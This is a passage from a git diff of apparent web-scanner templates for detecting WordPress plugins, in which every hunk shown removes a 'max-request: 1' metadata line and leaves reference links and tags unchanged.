b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ 